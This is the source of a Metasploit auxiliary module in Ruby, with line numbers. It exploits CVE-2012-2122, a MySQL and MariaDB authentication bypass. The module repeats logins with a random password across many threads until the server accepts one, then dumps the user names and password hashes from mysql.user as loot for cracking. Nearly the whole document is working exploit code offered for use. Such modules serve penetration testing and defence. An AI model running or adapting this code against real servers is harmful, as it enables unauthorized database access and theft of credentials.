Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/proto/mysql/client'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::Remote::MYSQL
10
  include Msf::Auxiliary::Report
11

12
  include Msf::Auxiliary::Scanner
13

14
  def initialize
15
    super(
16
      'Name'           => 'MySQL Authentication Bypass Password Dump',
17
      'Description'    => %Q{
18
        This module exploits a password bypass vulnerability in MySQL in order
19
        to extract the usernames and encrypted password hashes from a MySQL server.
20
        These hashes are stored as loot for later cracking.
21

22
        Impacts MySQL versions:
23
        - 5.1.x before 5.1.63
24
        - 5.5.x before 5.5.24
25
        - 5.6.x before 5.6.6
26

27
        And MariaDB versions:
28
        - 5.1.x before 5.1.62
29
        - 5.2.x before 5.2.12
30
        - 5.3.x before 5.3.6
31
        - 5.5.x before 5.5.23
32
      },
33
      'Author'        => [
34
          'theLightCosine', # Original hashdump module
35
          'jcran' # Authentication bypass bruteforce implementation
36
        ],
37
      'References'     => [
38
          ['CVE', '2012-2122'],
39
          ['OSVDB', '82804'],
40
          ['URL', 'https://www.rapid7.com/blog/post/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/']
41
        ],
42
      'DisclosureDate' => 'Jun 09 2012',
43
      'License'        => MSF_LICENSE
44
    )
45

46
    deregister_options('PASSWORD')
47
    register_options( [
48
      OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ])
49
    ])
50
  end
51

52

53
  def run_host(ip)
54

55
    # Keep track of results (successful connections)
56
    results = []
57

58
    # Username and password placeholders
59
    username = datastore['USERNAME']
60
    password = Rex::Text.rand_text_alpha(rand(8)+1)
61

62
    # Do an initial check to see if we can log into the server at all
63

64
    begin
65
      socket = connect(false)
66
      close_required = true
67
      mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket)
68
      results << mysql_client
69
      close_required = false
70

71
      print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}"
72

73
    rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged
74
      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"
75
      return
76
    rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
77
      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"
78
    rescue ::Interrupt
79
      raise $!
80
    rescue ::Exception => e
81
      print_error "#{rhost}:#{rport} Error: #{e}"
82
      return
83
    ensure
84
      socket.close if socket && close_required
85
    end
86

87
    # Short circuit if we already won
88
    if results.length > 0
89
      self.mysql_conn = results.first
90
      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)
91
    end
92

93

94
    #
95
    # Threaded login checker
96
    #
97
    max_threads = 16
98
    cur_threads = []
99

100
    # Try up to 1000 times just to be sure
101
    queue   = [*(1 .. 1000)]
102

103
    while(queue.length > 0)
104
      while(cur_threads.length < max_threads)
105

106
        # We can stop if we get a valid login
107
        break if results.length > 0
108

109
        # keep track of how many attempts we've made
110
        item = queue.shift
111

112
        # We can stop if we reach 1000 tries
113
        break if not item
114

115
        # Status indicator
116
        print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0
117

118
        t = Thread.new(item) do |count|
119
          begin
120
            # Create our socket and make the connection
121
            close_required = true
122
            s = connect(false)
123
            mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)
124

125
            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
126
            results << mysql_client
127
            close_required = false
128
          rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
129
          rescue ::Exception => e
130
            print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"
131
          ensure
132
            s.close if socket && close_required
133
          end
134
        end
135

136
        cur_threads << t
137
      end
138

139
      # We can stop if we get a valid login
140
      break if results.length > 0
141

142
      # Add to a list of dead threads if we're finished
143
      cur_threads.each_index do |ti|
144
        t = cur_threads[ti]
145
        if not t.alive?
146
          cur_threads[ti] = nil
147
        end
148
      end
149

150
      # Remove any dead threads from the set
151
      cur_threads.delete(nil)
152

153
      ::IO.select(nil, nil, nil, 0.25)
154
    end
155

156
    # Clean up any remaining threads
157
    cur_threads.each {|x| x.kill }
158

159

160
    if results.length > 0
161
      print_good("#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes...")
162
      self.mysql_conn = results.first
163
      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)
164
    end
165

166
    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
167
  end
168

169
  def dump_hashes(host, port)
170

171
    # Grabs the username and password hashes and stores them as loot
172
    res = mysql_query("SELECT user,password from mysql.user")
173
    if res.nil?
174
      print_error("#{host}:#{port} There was an error reading the MySQL User Table")
175
      return
176

177
    end
178

179
    # Create a table to store data
180
    tbl = Rex::Text::Table.new(
181
      'Header'  => 'MysQL Server Hashes',
182
      'Indent'   => 1,
183
      'Columns' => ['Username', 'Hash']
184
    )
185

186
    if res.size > 0
187
      res.each do |row|
188
        next unless (row[0].to_s + row[1].to_s).length > 0
189
        tbl << [row[0], row[1]]
190
        print_good("#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}")
191
      end
192
    end
193

194
    this_service = nil
195
    if framework.db and framework.db.active
196
      this_service = report_service(
197
        :host  => host,
198
        :port => port,
199
        :name => 'mysql',
200
        :proto => 'tcp'
201
      )
202
    end
203

204
    report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty?
205

206
  end
207

208
  # Stores the Hash Table as Loot for Later Cracking
209
  def report_hashes(hash_loot,service, host, port)
210
    filename= "#{host}-#{port}_mysqlhashes.txt"
211
    path = store_loot("mysql.hashes", "text/plain", host, hash_loot, filename, "MySQL Hashes", service)
212
    print_good("#{host}:#{port} Hash Table has been saved: #{path}")
213

214
  end
215
end
216

217